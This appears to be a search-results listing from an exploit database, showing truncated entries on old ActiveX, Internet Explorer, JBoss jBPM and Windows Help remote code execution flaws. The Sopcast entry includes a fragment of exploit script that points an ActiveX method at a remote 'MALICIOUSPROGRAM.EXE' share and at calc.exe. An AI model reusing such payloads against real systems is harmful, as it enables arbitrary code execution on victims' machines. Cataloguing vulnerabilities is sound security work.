108 matches found
Sopcast SopCore Control - sopocx.ocx Command Execution
Sopcast SopCore Control - sopocx.ocx Command Execution window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe";...
Autodesk DWF Viewer Control / LiveUpdate Module Remote Exploit
No description provided by source. !-- Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit by Nine:Situations:Group::bruiser site: http://retrogod.altervista.org/ tested against IE6 tested software: Revit Architecture 2009 sp2 Autodesk Design Review 2009 which also comes...
Autodesk DWF Viewer Control LiveUpdate Module - Remote Code Execution
Autodesk DWF Viewer Control LiveUpdate Module - Remote Code Execution !-- Autodesk DWF Viewer Control / LiveUpdate Module remote code execution exploit by Nine:Situations:Group::bruiser site: http://retrogod.altervista.org/ tested against IE6 tested software: Revit Architecture 2009 sp2 Autodesk...
Design/Logic Flaw
The InstallProduct routine in the Verisign VUpdater.Install aka i-Nav ActiveX control does not verify Microsoft Cabinet .CAB files, which allows remote attackers to run an arbitrary executable file...
[Full-disclosure] JBoss jBPM 2.0: Remote code execution and classloader covert channel
Security Advisory: jBPM 2.0 Date: 06/22/05 URL: http://www.illegalaccess.org/java/jbpm.php " JBoss jBPM is a flexible, extensible workflow management system." jbpm.org Problem 1: Remote code execution possible with jBPM . This allows an attacker to trigger an arbitrary executable on the jBPM/ JBo...
Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)
source: https://www.securityfocus.com/bid/9658/info Microsoft Internet Explorer has been reported prone to a vulnerability that may permit hostile content to be interpreted in the Local Zone. The issue may be exploited via the ITS InfoTech Storage Protocol URI handler. It is possible to use this...
Microsoft Windows 95/98/NT 4.0 - Help File Backdoor
source: https://www.securityfocus.com/bid/868/info The help files for the Windows Help system .cnt, .hlp can be edited so that they run an arbitrary executable when selected by a user. The executable will run at the privelege level of the user. The .cnt files are like tables of contents that tell...
Microsoft Windows 9598NT 4.0 - Help File Backdoor
Microsoft Windows 9598NT 4.0 - Help File Backdoor source: https://www.securityfocus.com/bid/868/info The help files for the Windows Help system .cnt, .hlp can be edited so that they run an arbitrary executable when selected by a user. The executable will run at the privelege level of the user. Th...